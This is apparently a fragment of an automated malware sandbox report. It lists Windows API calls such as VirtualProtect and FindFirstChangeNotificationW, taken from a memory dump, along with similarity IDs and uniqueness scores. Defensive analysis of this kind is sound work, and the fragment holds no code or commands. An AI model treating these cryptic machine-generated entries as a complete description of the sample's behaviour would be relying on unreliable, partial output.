                                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1183101841.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ChangeFindFirstNotification$IconLoad
                                                                                                                                                                                                                                                                                    • String ID: n$8n$8n$8n$Hn$Xn$Xn
                                                                                                                                                                                                                                                                                    • API String ID: 2944710551-1746711009
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1183101841.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID: *
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-163128923
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Non-executed Functions